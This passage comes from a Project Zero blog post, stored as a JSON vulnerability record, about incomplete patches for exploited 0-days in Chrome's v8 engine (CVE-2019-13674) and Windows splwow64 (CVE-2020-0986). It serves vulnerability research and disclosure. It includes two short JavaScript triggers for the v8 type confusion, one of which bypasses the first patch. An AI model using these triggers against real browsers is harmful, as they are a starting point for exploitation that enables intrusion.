Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That\u2019s when he realized that the patch didn\u2019t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei\u2019s blog post, \u201c[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\u201d. \n\nTo summarize, the vulnerability is a type confusion in Chrome\u2019s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8\u2019s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8\u2019s integer type is that it is not closed under addition meaning that adding two integers doesn\u2019t always result in an integer. An example of this is +Infinity + -Infinity = NaN. \n\nTherefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you\u2019re interested! \n\nfor (var i = -Infinity; i &lt; 0; i += Infinity) { } \n \n--- \n \n[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.\n\nvar increment = -Infinity;\n\nvar k = 0;\n\n// The initial loop value is 0 and the increment is -Infinity.\n\n// This is permissible because 0 + -Infinity = -Infinity, an integer.\n\nfor (var i = 0; i &lt; 1; i += increment) {\n\nif (i == -Infinity) {\n\n// Once the initial variable equals -Infinity (one loop through)\n\n// the increment is changed to +Infinity. -Infinity + +Infinity = NaN\n\nincrement = +Infinity;\n\n}\n\nif (++k &gt; 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nTo \u201crevive\u201d the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity. \n\nUnfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible \u201ctype confusions\u201d. Again, check out [Sergei\u2019s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you\u2019re interested in more details. \n\nThis is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it\u2019s important to work towards \u201ccorrect &amp; comprehensive\u201d patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don\u2019t find and detect all exploited 0-days and we certainly don\u2019t find them all in a timely manner. \n\n## Windows splwow64 CVE-2020-0986\n\nThis vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only[ disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). \n\nMicrosoft\u2019s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn\u2019t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.\n\n# Correct and comprehensive patches\n\nWe\u2019ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year. \n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes. \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.\n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nWhile the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.\n\nIn 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you\u2019re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)\n\nIn addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.\n", "modified": "2021-02-03T00:00:00", "published": "2021-02-03T00:00:00", "id": "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "href": "https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html", "type": "googleprojectzero", "title": "\nD\u00e9j\u00e0 vu-lnerability\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}